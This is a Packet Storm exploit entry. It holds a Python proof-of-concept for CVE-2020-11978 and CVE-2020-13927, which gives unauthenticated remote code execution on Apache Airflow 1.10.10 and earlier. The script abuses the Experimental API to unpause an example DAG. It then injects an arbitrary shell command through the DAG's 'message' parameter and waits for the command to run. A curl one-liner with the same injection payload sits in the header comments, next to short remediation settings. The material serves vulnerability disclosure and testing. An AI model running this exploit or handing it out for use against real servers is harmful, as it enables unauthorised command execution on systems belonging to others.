PACKETSTORM:162908

Apache Airflow 1.10.10 Remote Code Execution

2021-06-02
Pepe Berba
packetstormsecurity.com
`# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution   
# Date: 2021-06-02  
# Exploit Author: Pepe Berba  
# Vendor Homepage: https://airflow.apache.org/  
# Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html  
# Version: <= 1.10.10  
# Tested on: Docker apache/airflow:1.10.10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml)
# CVE : CVE-2020-11978  
#   
# This is a proof of concept for CVE-2020-11978, an RCE vulnerability in one of the example DAGs shipped with Airflow.
# It combines with CVE-2020-13927, where unauthenticated requests to Airflow's Experimental API were allowed by default.
# Together, the two potentially allow unauthenticated RCE against Airflow.
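# For illustration, the same DAG run could also be triggered by hand with curl (host and command here are
# placeholders); the "message" value is rendered into the example DAG's bash_command:
#   curl -X POST http://127.0.0.1:8080/api/experimental/dags/example_trigger_target_dag/dag_runs \
#        -H 'Content-Type: application/json' \
#        -d '{"conf": {"message": "\"; touch test #"}}'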
#   
# Repo: https://github.com/pberba/CVE-2020-11978  
# More information can be found here:   
# https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E  
# https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E  
#  
# Remediation:  
# For CVE-2020-13927, make sure the config sets `[api] auth_backend = airflow.api.auth.backend.deny_all` or another auth backend.
# For CVE-2020-11978, upgrade to 1.10.11 or later, or set `load_examples=False` when initializing Airflow. You can also manually delete the example_trigger_target_dag DAG.
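# A minimal airflow.cfg sketch of those two settings (adjust section placement to your deployment):
#   [core]
#   load_examples = False
#   [api]
#   auth_backend = airflow.api.auth.backend.deny_all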
#  
# Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 "touch test"  
  
import argparse  
import requests  
import sys  
import time  
  
def create_dag(url, cmd):
    print('[+] Checking if Airflow Experimental REST API is accessible...')
    check = requests.get('{}/api/experimental/test'.format(url))

    if check.status_code == 200:
        print('[+] /api/experimental/test returned 200')
    else:
        print('[!] /api/experimental/test returned {}'.format(check.status_code))
        print('[!] Airflow Experimental REST API might not be accessible')
        sys.exit(1)
  
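    # The vulnerable example DAG renders dag_run.conf['message'] directly into bash_task's bash_command;
    # the patched DAG passes it via the operator's `env` mapping instead, which is why the presence of
    # 'dag_run' in the task's reported `env` field is treated below as "already patched".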
    check_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url))
    if check_task.status_code != 200:
        print('[!] Failed to find the example_trigger_target_dag.bash_task')
        print('[!] Host isn\'t vulnerable to CVE-2020-11978')
        sys.exit(1)
    elif 'dag_run' in check_task.json()['env']:
        print('[!] example_trigger_target_dag.bash_task is patched')
        print('[!] Host isn\'t vulnerable to CVE-2020-11978')
        sys.exit(1)
    print('[+] example_trigger_target_dag.bash_task is vulnerable')
  
    unpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url))
    if unpause.status_code != 200:
        print('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded')
        sys.exit(1)
    else:
        print('[+] example_trigger_target_dag was enabled')
  
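    # Payload sketch: '"; <cmd> #' breaks out of the quoted echo that the example DAG builds around the
    # message, so the rendered bash_command runs the injected command and comments out the trailing quote.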
    print('[+] Creating new DAG...')
    res = requests.post(
        '{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url),
        json={
            'conf': {
                'message': '"; {} #'.format(cmd)
            }
        }
    )

    if res.status_code == 200:
        print('[+] Successfully created DAG')
        print('[+] "{}"'.format(res.json()['message']))
    else:
        print('[!] Failed to create DAG')
        sys.exit(1)
  
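    # Poll the task-instance endpoint until the scheduler picks the task up; its state is reported as a
    # string and, in a typical run, moves from 'None' to 'queued' to 'running' and finally 'success'.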
    wait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format(
        url=url,
        execution_date=res.json()['execution_date']
    )

    start_time = time.time()
    print('[.] Waiting for the scheduler to run the DAG... This might take a minute.')
    print('[.] If the bash task is never queued, then the scheduler might not be running.')
    while True:
        time.sleep(10)
        res = requests.get(wait_url)
        status = res.json()['state']
        if status == 'queued':
            print('[.] Bash task queued...')
        elif status == 'running':
            print('[+] Bash task running...')
        elif status == 'success':
            print('[+] Bash task successfully ran')
            break
        elif status == 'None':
            print('[-] Bash task is not yet queued...')
        else:
            print('[!] Bash task was {}'.format(status))
            sys.exit(1)

    return 0
  
  
def main():
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('url', type=str, help="Base URL for Airflow")
    arg_parser.add_argument('command', type=str)
    args = arg_parser.parse_args()

    create_dag(
        args.url,
        args.command
    )
  
if __name__ == '__main__':  
    main()
  
`